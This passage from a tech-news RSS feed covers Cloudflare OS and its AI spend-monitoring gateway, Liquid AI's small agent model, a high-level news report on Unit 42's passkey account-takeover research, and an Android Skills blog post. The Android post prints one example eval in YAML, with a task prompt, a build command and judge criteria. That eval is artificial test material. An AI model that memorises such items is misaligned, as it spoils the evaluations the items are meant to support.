<p class="wp-block-paragraph">Cloudflare OS is built on Cloudflare Workers, <a href="https://www.infoworld.com/article/4149869/cloudflare-launches-dynamic-workers-for-ai-agent-execution.html" target="_blank">Dynamic Workers</a>, Durable Objects, and Access, the company’s zero trust network access (ZTNA) tool that verifies every user and request. Agents start with zero permissions by default and are only granted access to tools required for a specific task. Organizations configure their own Access policies, models, branding, skills, and integrations, Kozlov explained.</p>



<p class="wp-block-paragraph">Governed connectors known as gatekeepers give admins control over what AI can see, what it can change, and when the system needs human sign-off. They can also control budgets, set rate limits, and delegate tasks to different models.</p>



<p class="wp-block-paragraph">“Because <a href="https://www.infoworld.com/article/4165857/are-we-ready-to-give-ai-agents-the-keys-to-the-cloud-cloudflare-thinks-so.html" target="_blank">agents act on people’s behalf</a> and produce work others can access and modify, they require a new security model,” Kozlov said. Thus, Cloudflare OS tracks the resources an agent requires so the right access controls follow its work when it is shared.</p>



<p class="wp-block-paragraph">Cloudflare initially built the OS for internal use, and employees “across every team” use it daily. Kozlov estimated that, over the last 30 days, internal users have used it to create more than 4,000 apps, automations, and tools. Over that same period, she claimed, the company’s sales team saved an estimated 10,000 hours by automating previously manual tasks like territory planning and proposal creation.</p>



<p class="wp-block-paragraph">“We open sourced Cloudflare OS so any organization can build ‘Your Company OS,’” Kozlov said. Open source is critical because “you cannot put your company into software you do not own. Organizations need to be able to inspect the platform, customize it, connect their own systems, and make it their own,” she explained.</p>



<h2 class="wp-block-heading">A more cohesive bundle</h2>



<p class="wp-block-paragraph">Cloudflare deserves credit for packaging Cloudflare OS as an operating system, noted tech analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p class="wp-block-paragraph">“This very much is not Windows, macOS, or Linux, and it isn’t an operating system by its common definition,” he said. “But Cloudflare’s use of this terminology implies familiarity to enterprise IT buyers.”</p>



<p class="wp-block-paragraph">This makes for an easier discussion as enterprises struggle to understand how to best incorporate AI-related platforms and workflows into infrastructure that wasn’t initially designed for it.</p>



<p class="wp-block-paragraph">Microsoft has marketed the combination of its Azure, Entra, Fabric, Windows, and Microsoft 365 offerings as an operating system of sorts, but hasn’t pulled all the pieces into a common brand, Levy said. And Google’s Gemini, Workspace, Vertex AI, and Cloud Run are “circling similar territory.”</p>



<p class="wp-block-paragraph">But, he noted, Cloudflare OS is “more cohesively bundled” and infrastructure-focused, offering a single pane of glass platform for buyers worried about stitching together otherwise disparate AI-aware networking pieces. The company recognizes that AI introduces new architectural realities such as inference and model routing “over and above” traditional OS core competencies.</p>



<p class="wp-block-paragraph">“While competing offerings generally leave the infrastructure heavy lifting to enterprise decision-makers, Cloudflare is marketing itself as a single-source vendor, which potentially frees IT planners from having to integrate all the AI pieces on their own,” Levy said.</p>



<p class="wp-block-paragraph">An infrastructure-first, application-agnostic approach means Cloudflare OS can coexist with whatever AI applications already exist in an enterprise, he said. It will “play nice” with OpenAI, Anthropic, Google, Microsoft, Meta, or open source layers, allowing employees to begin working in familiar workflows after sign-in.</p>



<p class="wp-block-paragraph">“Its open-source architecture also minimizes the potential for vendor lock-in as enterprises gradually figure out how to evolve their stacks to align with new AI-era realities,” Levy said.</p>



<h2 class="wp-block-heading">Managing identities and budgets for both humans and AI</h2>



<p class="wp-block-paragraph">As AI agents emerge across the enterprise, tracking their use can be challenging, causing problems from both a security and a spend standpoint. Along with Cloudflare OS, the company has launched a way to address this issue with its new <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-gives-companies-full-visibility-to-audit-and-analyze-ai-use/" target="_blank" rel="noreferrer noopener">Identity-Aware AI Gateway</a>, now in beta.</p>



<p class="wp-block-paragraph">Also integrated with Access, the offering gives admins visibility into what users (both human and AI) are requesting from AI models. It allows security teams to set up custom domains in front of their gateways and replace shared API keys by integrating with their identity provider, like Okta or Entra, and ZTNA infrastructure, Cloudflare explained.</p>



<p class="wp-block-paragraph">Every request is tied to Access-verified identities, and enterprises can filter each user’s logs, analytics, and spend. IT teams can track redundancies, limit usage rates, and apply filters that strip out employee names, passwords, and other sensitive data before requests go to outside model providers.</p>



<p class="wp-block-paragraph">A companion feature, AI Spend, tracks every user’s behavior over time to create a baseline of normal AI usage. When spending deviates from that pattern, the system alerts the IT team.</p>



<p class="wp-block-paragraph">A new tab, User Insights, tracks cost and identifies over-spend caused by activities such as low cache-hit rates or oversized context windows. The capability scores sessions and compares them against account history using a 95th percentile session cost over the previous 30 days, Cloudflare product managers <a href="https://blog.cloudflare.com/author/ming-lu/" target="_blank" rel="noreferrer noopener">Ming Lu</a>, <a href="https://blog.cloudflare.com/author/kenny/" target="_blank" rel="noreferrer noopener">Kenny Johnson</a>, and <a href="https://blog.cloudflare.com/author/ayush/" target="_blank" rel="noreferrer noopener">Ayush Kumar</a> explain in a <a href="https://blog.cloudflare.com/identity-aware-ai-gateway/" target="_blank" rel="noreferrer noopener">blog post</a>. Anything above 2x an account’s 95th percentile is a “strong candidate for anomalous behavior.”</p>



<p class="wp-block-paragraph">For instance, one Cloudflare customer had an employee who left a rogue AI session running, generating a $30K bill. “User Insights helped them identify the problem and shut off access before the problem was further exacerbated,” Kozlov said.</p>



<p class="wp-block-paragraph">Cloudflare is also building prompt classification functionality that sorts requests into categories such as coding or writing. This can help enterprises understand what AI is being used for.</p>



<p class="wp-block-paragraph">“Once business traffic is separated from everything else, personal use becomes visible,” the project managers explained. “From the outside, someone running a side hustle on company time and someone quietly moving data out through a model look the same. Telling them apart is central to catching insider risk.”</p>



<h2 class="wp-block-heading">Looking at the bigger picture</h2>



<p class="wp-block-paragraph">Identity-Aware AI Gateway and AI Spend address the visibility problem that has dogged so many recent AI deployments where enterprises failed to monitor usage, Levy noted. Projects “crashed and burned” as users unwittingly blew through token allocations.</p>



<p class="wp-block-paragraph">These platforms provide single-point visibility into what is being used, how it’s being used, and where the potential lies for raising the productivity bar, he said. They overlay with existing models; in doing so, they enhance security with more precise control over resource allocations, and via automated anonymization protocols that prevent inadvertent sharing of sensitive data.</p>



<p class="wp-block-paragraph">Ultimately, he said, vendors who free IT from having to independently assemble the pieces of their own AI implementations, and who assist them with answers to AI-specific questions, “will gain advantage over vendors that aren’t looking at the bigger picture.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[No cloud, no GPUs, no problem: Liquid AI's new model LFM2.5-2.6B brings powerful AI agents to devices as small as a Raspberry Pi]]></title>
<description><![CDATA[Earlier this week, the AI startup Liquid, formed in 2023 by former MIT computer scientists, debuted LFM2.5-2.6B, a new open-weight language model designed specifically for agentic workloads. In release materials and a recent interview with VentureBeat, Liquid's researchers said LFM2.5-2.6B can ru...]]></description>
<link>https://tsecurity.de/de/3709207/it-nachrichten/no-cloud-no-gpus-no-problem-liquid-ais-new-model-lfm25-26b-brings-powerful-ai-agents-to-devices-as-small-as-a-raspberry-pi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709207/it-nachrichten/no-cloud-no-gpus-no-problem-liquid-ais-new-model-lfm25-26b-brings-powerful-ai-agents-to-devices-as-small-as-a-raspberry-pi/</guid>
<pubDate>Fri, 07 Aug 2026 02:35:01 +0200</pubDate>
<content:encoded><![CDATA[<p>Earlier this week, the AI startup Liquid, formed in 2023 by former MIT computer scientists, <a href="https://www.liquid.ai/blog/lfm2-5-2-6b">debuted LFM2.5-2.6B</a>, a new open-weight language model designed specifically for agentic workloads. </p><p>In release materials and a recent interview with VentureBeat, Liquid's researchers said LFM2.5-2.6B can run entirely on local hardware — from smartphones and laptops down to a Raspberry Pi — without relying on cloud inference or GPUs, unlocking edge AI applications and giving more options to enterprises working in regulated industries or with sensitive information they don't want to send up to the cloud. </p><p>It's best suited for high-volume, well-defined agentic tasks that run locally — tool calling, document management, calendar and workflow automation, and always-on background routines — and for connectivity-limited environments like vehicles and robotics, though coding-heavy work is better left to larger models.</p><p>Even for those businesses without such concerns, the appeal of running performant, task-specific agents at the cost of essentially electricity, may be enough to make the new model quite appealing. </p><p>But the <a href="https://huggingface.co/LiquidAI/LFM2.5-2.6B/blob/main/LICENSE">custom open weights license</a>, as with <a href="https://venturebeat.com/technology/kimi-k3s-full-weights-are-here-but-theyre-open-with-a-caveat-what-enterprises-should-know">Moonshot's larger frontier model Kimi K3</a> released last month, is worth a close look by enterprise legal teams. </p><h2><b>The basics</b></h2><p>LFM2.5-2.6B contains 2.6 billion parameters, supports a 128,000-token context window, and includes native tool calling. The somewhat tricky name is explained by the generation of model (2.5) combined with the parameter count (2.6B).  </p><p>Both the post-trained model and a base checkpoint (LFM2.5-2.6B-Base) for developers who want to fine-tune it are available now on <a href="https://huggingface.co/LiquidAI/LFM2.5-2.6B">Hugging Face</a>, with day-one support for major inference stacks including llama.cpp, MLX, vLLM, SGLang, and ONNX — positioning it for deployment across consumer hardware, enterprise infrastructure, and embedded systems.</p><p>Liquid also offers an open source fine-tuning framework, <a href="https://github.com/Liquid4All/leap-finetune">LEAP</a>.</p><p>Rather than positioning LFM2.5-2.6B as a competitor to the largest frontier models, the company is making a different argument: that a sufficiently capable small model can unlock categories of enterprise applications where latency, privacy, deployment flexibility, or inference costs matter more than absolute benchmark leadership.</p><p>"I do also believe that the best models will be in the cloud, and there's no problem with that," Maxime Labonne, Liquid AI's head of post-training, told VentureBeat in an interview following the launch. "We want to make models for another type of user, and the best way of describing it is: you should use [edge AI] when you can't use a cloud model."</p><h2><b>Small enough for a Raspberry Pi</b></h2><p>Asked about the minimum viable hardware, Labonne said the model runs "very, very well" on CPUs — and that the LFM2 architecture underlying the model was explicitly designed around real-world CPU performance rather than GPU benchmarks.</p><p>"I think the best example is a Raspberry Pi," he said. "We have a lot of demos that show that actually, it works pretty fast on the Raspberry Pi."</p><p>Company-reported measurements indicate decoding throughput of approximately 220 tokens per second on an Apple M5 Max and 113 tokens per second on an AMD Ryzen AI Max+ 395, while using less than 2.5 GB of memory — and around 30 tokens per second on a smartphone. Users can try the models on their phones through Apollo, Liquid AI's mobile app.</p><p>At the other end of the deployment spectrum, Liquid AI reports the model reaches nearly 15,000 output tokens per second on a single Nvidia H100 GPU under sustained concurrent load — roughly 1.3 billion tokens per day on one card. These figures are vendor benchmarks and have not been independently verified.</p><p>For Labonne, memory footprint and speed are not conveniences but hard constraints that determine what can be deployed at all.</p><p>"What we want to show is that it's a really good trade-off, because you get the level of quality that you get with much bigger models, but in a tiny, tiny form factor," he said. "You can deploy it in target devices where you are not able to deploy the other ones at all."</p><h2><b>Trained for agents instead of chatbots</b></h2><p>Liquid AI says LFM2.5-2.6B was developed around the assumption that language models are increasingly consumed through agent frameworks rather than traditional conversational interfaces.</p><p>"Models are not consumed in chatbots anymore. They're really consumed through agentic harnesses, like OpenClaw, like Hermes Agent," Labonne said. "We wanted to make sure that this model is not just good at math or at code, but it's good at using tools."</p><p>The model is pretrained on approximately 34 trillion tokens, with a vocabulary doubled to 128K to better support non-Latin scripts and a dedicated mid-training phase to extend the context window to 128K tokens for long-running agent workflows.</p><p>Post-training follows a four-stage pipeline: supervised fine-tuning, teacher specialization (training separate expert models for domains like instruction following, math, code, and tool use), multi-domain on-policy distillation (MOPD) to merge those experts' capabilities back into a single student model, and finally agentic reinforcement learning. </p><p>During that last stage, the model was trained directly inside production agent harnesses — including Hermes Agent and OpenClaw — on realistic productivity tasks involving research, coding, document management, tool invocation, and workflow automation, exposing it to those harnesses' actual tools, system prompts, and interaction patterns.</p><p>Labonne described the pipeline overhaul as producing a "happy accident": gains that extended well beyond the agentic targets.</p><p>"Through these new training techniques, we also got a lot better at everything. We got better at math, at instruction following. We've never been good at code, actually — and with this, we even got really good at code," he said.</p><h2><b>Building the model — and the harness</b></h2><p>Notably, Liquid AI also built its own agent harness rather than relying solely on existing frameworks, and demonstrated the model running inside it on a phone, planning and calling tools entirely on-device.</p><p>"This is a harness running on a phone, and I don't know if there's any other harness running on a phone," Labonne said.</p><p>The company had two reasons, he explained. The first was necessity — no phone-native harness existed. The second is a different interaction model: today's harnesses wait for a prompt, and Liquid AI wants assistants that act on their own.</p><p>"We want proactive agents. We want agents that run in the background, check what you're doing, check your calendar, and based on this context, do tasks," he said. "That doesn't exist today, really."</p><p>Co-designing the harness and model also lets the software compensate for the model's weak spots. "Everything that the model is bad at, the harness should help the model with — provide as much assistance as possible to make it more reliable," Labonne said. "End users don't care if it's the model or the harness. What they want is that the task is achieved at the end of the day."</p><p>The model nevertheless works out of the box with established harnesses including Hermes Agent, OpenClaw, and Pi, served behind any OpenAI-compatible endpoint.</p><h2><b>Swap the harness, not the model</b></h2><p>For enterprise deployment, Labonne argued the release marks a shift in what small models can be used for. Until now, he said, local models made economic sense mainly as narrowly fine-tuned specialists — trained to do one thing at cloud-model quality, much faster and cheaper. Agentic capability changes that calculus, because the same model can be repurposed by changing the tools around it rather than the model itself.</p><p>"You can have a calendar assistant, and you can reuse the same model and make a meeting assistant that will record what everybody said and summarize it — a bit like Granola, for example," he said. "You don't change the model; you just change the harness. You just change the tools around it. This gives much more generalizability, and it's a lot easier to do and a lot cheaper as well."</p><p>He still recommends fine-tuning for production deployments whenever feasible: "If you don't fine-tune it, you leave some quality on the table. If you fine-tune it well, it's going to match the performance of GPT and Claude — really, if your task is not the most complex task in the world," he said, adding that the barrier to entry has collapsed: "The bar to be able to do fine-tuning now is super low. It's very accessible to everyone."</p><h2><b>How it stacks up against DeepSeek-V4-Flash, Google's Gemma and Alibaba's Qwen</b></h2><p>Liquid AI released its own benchmark comparison charts pitting LFM2.5-2.6B against the models enterprises are most likely to shortlist for the same edge deployments: Google's Gemma 4 E2B (5.1B parameters) and E4B (8B), and Alibaba's Qwen3.5-4B (4.7B) and Qwen3.5-9B (9.7B). </p><p>A separate test by local AI client platform <a href="https://x.com/atomic_chat_hq/status/2085405031474343963">Atomic Chat</a> found that LFM2.5-2.6B completed 35 tool calls to complete three tasks (checking weather and local time in six cities, converting one budget into six currencies, checking four hotels and booking for a date) 3.7 times faster than DeepSeek-V4-Flash (a whopping 284B parameters), the model has <a href="https://x.com/natolambert/status/2084790959636922652?s=20">skyrocketed</a> to the top of <a href="https://openrouter.ai/rankings#top-models">OpenRouter</a> since its release last week. </p><div></div><p>Gemma 4's small models are multimodal generalists, accepting image and audio input alongside text, and use a Per-Layer Embeddings design that keeps only a fraction of their weights active per token — which is why Google markets them by "effective" size (2.3B and 4.5B) despite total footprints of 5.1B and 8B. Alibaba's Qwen3.5 small series, <a href="https://venturebeat.com/technology/alibabas-small-open-source-qwen3-5-9b-beats-openais-gpt-oss-120b-and-can-run">released in March</a>, is natively multimodal from 4B up and leans on scaled reinforcement learning to chase frontier-style reasoning — Alibaba touts the 9B model as matching or beating OpenAI's far larger gpt-oss-120B on reasoning benchmarks.</p><p>LFM2.5-2.6B takes a narrower path: it is text-only, dense, and specialized for agentic work, with Liquid AI shipping separate vision and audio variants of the LFM family rather than folding everything into one checkpoint. </p><p>Where Qwen's post-training reinforcement learning targets reasoning, Liquid's targets tool use inside real agent harnesses. </p><p>The result, per the company's published numbers, is that the smallest model in the comparison leads every instruction-following benchmark (IFBench, Multi-IF, IFStruct) and nearly every tool-use benchmark — 77.83 on ToolSandbox versus 76.44 for Qwen3.5-9B, a model nearly four times its size — trailing only that 9B model on BFCLv4. </p><p>On agentic evaluations it beats both Gemma models across the board and essentially ties the Qwens: 26.89 on BrowseComp+ versus 27.23 for Qwen3.5-9B. It also posts the best score on AA Omniscience, a knowledge benchmark that penalizes hallucination.</p><p>The Qwen models keep the edge where their training focus lies: math (Qwen3.5-9B leads AIME25) and coding, where larger models retain an advantage on LiveCodeBench — though Labonne noted the gap is smaller than the parameter counts would suggest.</p><p>"With LiveCodeBench v6, we might not be the best among these models, but we're also by far the smallest. Showing that we're competitive with them is already quite a big win for me," he said.</p><p>One differentiator cuts the other way: licensing. Gemma 4 and Qwen3.5 ship under the permissive Apache 2.0 license — <a href="https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter">a change Google made specifically to court enterprises</a>. DeepSeek-V4-Flash ships <a href="https://huggingface.co/datasets/choosealicense/licenses/blob/main/markdown/mit.md">under a similarly permissive MIT License</a>. </p><p>Meanwhile, Liquid AI's revenue-gated license (detailed below) asks larger companies to strike a commercial deal. Enterprises above the threshold are effectively trading license friction for footprint and tool-use performance.</p><h2><b>Licensing reflects a commercial middle ground</b></h2><p>LFM2.5-2.6B is distributed under the <a href="https://huggingface.co/LiquidAI/LFM2.5-2.6B/blob/main/LICENSE">LFM Open License v1.0,</a> which permits use, modification, and redistribution — including commercial use — for organizations with less than $10 million in annual revenue. Commercial use by larger companies is not covered by the license, requiring a separate arrangement with Liquid AI; qualified nonprofits are exempt from the threshold for non-commercial and research purposes.</p><p>Labonne framed the structure as a way to sustain model development — "the models are really the moats, so we need to be sensible in the way that we license them; otherwise, we cannot make money, so we can't make more models" — while characterizing the threshold as a light-touch mechanism in practice.</p><p>Asked how the company would even know if a large enterprise quietly deployed the open weights, he was candid: "I think this is a question for our legal team, but personally, I don't know. And even if you're above $10 million, the only thing that we ask you is to contact us."</p><p>The company pairs its licensed model releases with freely published research, he added, including new structured-output evaluations and a training technique that mitigates the repetition loops common in small models — a failure mode he noted Qwen models are "kind of guilty of."</p><h2><b>Small model, big enterprise implications</b></h2><p>The launch coincided with an announcement from <a href="https://www.liquid.ai/blog/macpaw-partners-liquid-ai-on-device-ai-mac-users">MacPaw</a>, the Ukrainian software company behind CleanMyMac and Setapp, of a long-term strategic partnership with Liquid AI to build an on-device AI stack for the Mac. </p><p>Liquid AI will design and fine-tune foundation models for Eney, MacPaw's macOS assistant, running locally on Apple silicon through MacPaw's Elix inference engine and Mnemos memory layer, with results expected later this year.</p><p>Labonne pointed to the deal as a concrete validation of the size argument: "One of the reasons why they chose us is also because the model is quite small, and they don't have all the memory budget to run the other models."</p><p>The release arrives as hardware vendors, operating system developers, and enterprise software companies increasingly invest in local AI execution — and as agent harnesses proliferate across the industry. Liquid AI's bet is that deployment economics, not raw scale, will define an important segment of that market: agents running continuously, everywhere, at zero marginal token cost.</p><p>Whether small, highly optimized agent models become a significant segment of enterprise AI will ultimately depend less on benchmark scores than on operational reliability. But Liquid AI's latest release suggests the next competitive frontier is no longer simply building larger models — it's building models small enough, and capable enough, to run wherever enterprise workflows already live.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quantum eMotion Aktie: Jmem Tek zeigt universellen Sicherheitschip () | aktiencheck.de]]></title>
<description><![CDATA[Abstrakte Darstellung von fortschrittlicher Cybersicherheit ... Am 12. Juni ging der Infrastrukturanbieter Vertical Data eine strategische Partnerschaft ...]]></description>
<link>https://tsecurity.de/de/3708942/it-security-nachrichten/quantum-emotion-aktie-jmem-tek-zeigt-universellen-sicherheitschip-aktiencheckde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708942/it-security-nachrichten/quantum-emotion-aktie-jmem-tek-zeigt-universellen-sicherheitschip-aktiencheckde/</guid>
<pubDate>Thu, 06 Aug 2026 20:10:26 +0200</pubDate>
<content:encoded><![CDATA[Abstrakte Darstellung von fortschrittlicher <b>Cybersicherheit</b> ... Am 12. Juni ging der Infrastrukturanbieter Vertical Data eine strategische Partnerschaft ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise passkey security under threat from malware]]></title>
<description><![CDATA[Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.
...]]></description>
<link>https://tsecurity.de/de/3708886/ai-nachrichten/enterprise-passkey-security-under-threat-from-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708886/ai-nachrichten/enterprise-passkey-security-under-threat-from-malware/</guid>
<pubDate>Thu, 06 Aug 2026 19:46:37 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.</p>



<p class="wp-block-paragraph">They also pointed out that the issues are not strictly caused by holes in passkeys so much as by weaknesses in the procedures surrounding them. </p>



<p class="wp-block-paragraph">“The researchers didn’t break the underlying cryptography. They exploited the seams around it: onboarding flows, recovery mechanisms and trust signals that weren’t being validated,” said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence. “That distinction matters because it tells us where the actual risk lives.”</p>



<p class="wp-block-paragraph">The <a href="https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/" target="_blank" rel="noreferrer noopener">Palo Alto report</a> showed attacks that, it said, “demonstrate how malware on a compromised endpoint can misuse onboarding, recovery and device trust workflows to take over passkey-protected accounts,” as well as “how an attacker can authenticate without user interaction, bypass user verification requirements and extract all synced passkey private keys.”</p>



<p class="wp-block-paragraph">Palo Alto described three categories of attack, collectively dubbed Pass-ta-key: Pass-ta-key, where an attacker takes over an account protected by a Google-synced passkey using malware running on the victim’s device, without requiring privilege escalation, device unlock or user interaction; Silver Pass-ta-key, which involves an attacker tricking Google Cloud Authenticator into believing the victim has unlocked the device with biometrics, leading to full account takeover without using the victim’s device during authentication; and Golden Pass-ta-key, which allows an attacker to extract all synced passkeys in a form that lets them be shared or sold on the credential black market.</p>



<p class="wp-block-paragraph">Given the complexity of most global enterprise threat surfaces, <a href="https://www.csoonline.com/article/4085426/your-passwordless-future-may-never-fully-arrive.html" target="_blank">some CISOs have struggled</a> with adapting passwordless processes to environments with legacy and virtual environments. Passcodes have <a href="https://www.csoonline.com/article/4197086/microsoft-is-forcing-an-enterprise-transition-to-passkeys-2.html" target="_blank">been recently embraced</a> by enterprise CISOs as the first step in implementing a passwordless strategy.</p>



<p class="wp-block-paragraph">Analysts and consultants in the main agreed that the flaw Palo Alto reports is significant, despite the fact that it assumes the attacker has already penetrated an environment and successfully installed malware. Sadly, given that such penetration only requires one privileged user anywhere to accidentally click on a poisoned link or attachment, the assumption of prior penetration is likely valid.</p>



<h2 class="wp-block-heading">Implementation issues are the problem</h2>



<p class="wp-block-paragraph">What the report reveals is less about any flaws within passcodes directly, and more about the lack of attention paid to a wide range of mechanisms surrounding them. </p>



<p class="wp-block-paragraph">Greis said CISOs now need to focus on what to do, and what to test, based on the assumption that user behavior is not always as expected. </p>



<p class="wp-block-paragraph">In several cases cited in the report, he pointed out, issues occurred “not because the standard is flawed, but because implementations haven’t caught up to it. It mirrors what we’ve seen repeatedly in security: the specification is sound, but the ecosystem implementing it is uneven.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed. </p>



<p class="wp-block-paragraph">“On any service where your organization is the relying party, require user verification and actually validate the user-verified flag in the authentication response,” he said. “The researchers found real-world services accepting logins without it, which quietly collapses a multi-factor login back into a single factor.”</p>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, added that he would stress to CISOs that this attack assumes a prior successful penetration. </p>



<p class="wp-block-paragraph">“This isn’t passkeys getting hacked from across the internet. It’s what [an attacker] does once they’re already inside the house. So the real headline is that ‘phishing resistant’ stops being resistant the moment the endpoint stops being clean,” he said.</p>



<p class="wp-block-paragraph">“Stop treating verification as optional,” he advised. “Flip it to required, check it server side every single time, and save your hardware bound keys, the YubiKeys of the world, for the accounts that matter most. A key that never leaves a physical device is a key no attacker can ever harvest in bulk.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/orfink/" target="_blank" rel="noreferrer noopener">Or Finkelstein</a>, head of marketing at Secret Double Octopus, agreed that CISOs have gotten complacent about the way in which systems support passkeys.</p>



<p class="wp-block-paragraph">“CISOs should probably look at how user verification is enforced, how enrollment and recovery work, have a clear and enforced policy on whether credentials are synced or device-bound, and have some ITDR system to quickly mitigate suspicious endpoints and authenticators,” he said. “In most serious enterprise environments, EDR and device management reduce the likelihood of initial attacks, but do not close every post-compromise attack path.”</p>



<h2 class="wp-block-heading">Poor support processes weaken passkeys</h2>



<p class="wp-block-paragraph">Some have argued that the lack of sufficiently robust support processes actually weakens passkey capabilities and undermines the whole point of such systems.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jwgoerlich/" target="_blank" rel="noreferrer noopener">J. Wolfgang Goerlich</a>, a member of the faculty of IANS and a longtime cybersecurity consultant, pointed out that the original FIDO2 spec eliminated credential theft by binding the private key to a physical authenticator. Synced passkeys reintroduced credential portability and therefore reintroduced the form of credential theft risk cited in the Palo Alto report.</p>



<p class="wp-block-paragraph">“A passwordless system is exactly as strong as the flow that re-establishes it,” he said. “Both serious techniques here start by forcing a device to re-enroll. Many security teams have never modeled, never monitored and never rehearsed a response to this.”</p>



<p class="wp-block-paragraph">Goerlich’s advice to CISOs is to require device-bound authenticators, such as hardware tokens or computers, for all privileged and sensitive access. They may consider allowing wallets for lower risk access, he said, “however, much like passwords in Web browsers have long been at risk, we must now consider passkeys in the browsers an unacceptable risk.”</p>



<p class="wp-block-paragraph">This article originally appeared on <a href="https://www.csoonline.com/article/4205751/report-passkey-security-issues-could-allow-account-takeover.html" target="_blank">CSOonline</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond Bots: Rethinking AI Support with a Hybrid AI Architecture]]></title>
<description><![CDATA[Learn how blending RAG and fine-tuning creates more effective AI support experiences.]]></description>
<link>https://tsecurity.de/de/3708870/ai-nachrichten/beyond-bots-rethinking-ai-support-with-a-hybrid-ai-architecture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708870/ai-nachrichten/beyond-bots-rethinking-ai-support-with-a-hybrid-ai-architecture/</guid>
<pubDate>Thu, 06 Aug 2026 19:46:33 +0200</pubDate>
<content:encoded><![CDATA[Learn how blending RAG and fine-tuning creates more effective AI support experiences.]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside Android Skills - Built for deprecation]]></title>
<description><![CDATA[Posted by Jose Alcérreca, Developer Relations Engineer, Android Developer RelationsWe released the official Android Skills in April, and the response surpassed all our expectations. In this blog post, I'll address some of the feedback we received, explaining the philosophy and methodology behind ...]]></description>
<link>https://tsecurity.de/de/3708769/android-tipps/inside-android-skills-built-for-deprecation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708769/android-tipps/inside-android-skills-built-for-deprecation/</guid>
<pubDate>Thu, 06 Aug 2026 19:15:22 +0200</pubDate>
<content:encoded><![CDATA[<i>Posted by Jose Alcérreca, Developer Relations Engineer, Android Developer Relations</i><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8ln8L4mIkAKvPGo4pncpuh0f3-nhaEgXAqmsg2-QiDpkz0Bfowftt9pZJZxvgK78Eg5JXrvqdfvtiP7y7_MsGNhAAuZGy1ExKE01KfZisOs_0hCeCodS0v-bmQJA1WQO7k3tbeUUrRZjQM-mHbPECDLoQa1OmqqORsLJXF8ge0gB5MzV8gl5eIiUJBI0/s8659/Inside%20Android%20Skills%20-%20Built%20for%20deprecation_Blog_V01.png"><img border="0" data-original-height="2765" data-original-width="8659" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8ln8L4mIkAKvPGo4pncpuh0f3-nhaEgXAqmsg2-QiDpkz0Bfowftt9pZJZxvgK78Eg5JXrvqdfvtiP7y7_MsGNhAAuZGy1ExKE01KfZisOs_0hCeCodS0v-bmQJA1WQO7k3tbeUUrRZjQM-mHbPECDLoQa1OmqqORsLJXF8ge0gB5MzV8gl5eIiUJBI0/s1600/Inside%20Android%20Skills%20-%20Built%20for%20deprecation_Blog_V01.png"></a>We released the official <a href="https://github.com/android/skills" target="_blank">Android Skills</a> in April, and the response surpassed all our expectations. In this blog post, I'll address some of the feedback we received, explaining the philosophy and methodology behind the project. Hopefully, this will also help you understand what happens behind the scenes when you install and use skills, allowing you to make better use of tokens and your own time.</p>

<h2>Why are there so few official skills?</h2>
<p>Currently, we only consider new skills when there's a verifiable knowledge gap in state-of-the-art (SOTA) models. Put simply: you don't need to teach the model what it already knows. (Though there are a few exceptions—read on!)</p>

<p>We’ve released around 20 official skills so far, and they intentionally target highly specific, fast-moving areas that standard models aren't fully grounded on yet—things like AGP 9, Navigation 3, advanced Camera APIs, and Perfetto SQL.</p>

<p>What about core, more general, skills? Every installed skill injects 100–200 tokens into the baseline context of every task you start. If that skill actually activates, that count can quickly jump into the thousands. In most cases, hoarding basic skills is both counterproductive and expensive. Before installing a skill for writing basic Kotlin or Compose, consider if your LLM of choice really needs it, or if it knows those topics well enough already.</p>

<h2>Evaluating skills</h2>
<p>Before their release, each skill is tested against a comprehensive set of evals that prove that the skill delivers clear value. These evals should pass when the skill is active, and fail otherwise. Evals are to skills what integration tests are to code.</p>

<pre><code>timeout_s: 1200
repository:
  url: [redacted - internal git repo]
  working_dir: wear_compose_m3_empty_app
category_ids:
  - wear
prompt: |-
  Add a horizontal pager to MainActivity.kt. Have three pages in the pager. Each page should contain
  the text "Page 1", "Page 2", and "Page 3" respectively in the center of the screen.
commands:
  build:
    - ./gradlew assembleDebug
acceptance_criteria:
  project_builds: true
  llm_diff_judge:
    - Must use `HorizontalPagerScaffold`.
    - Each page should use `AnimatedPage` to wrap a `ScreenScaffold`.</code></pre>

<p><em>Example eval that checks the correct implementation of a horizontal pager on a wear app</em></p>

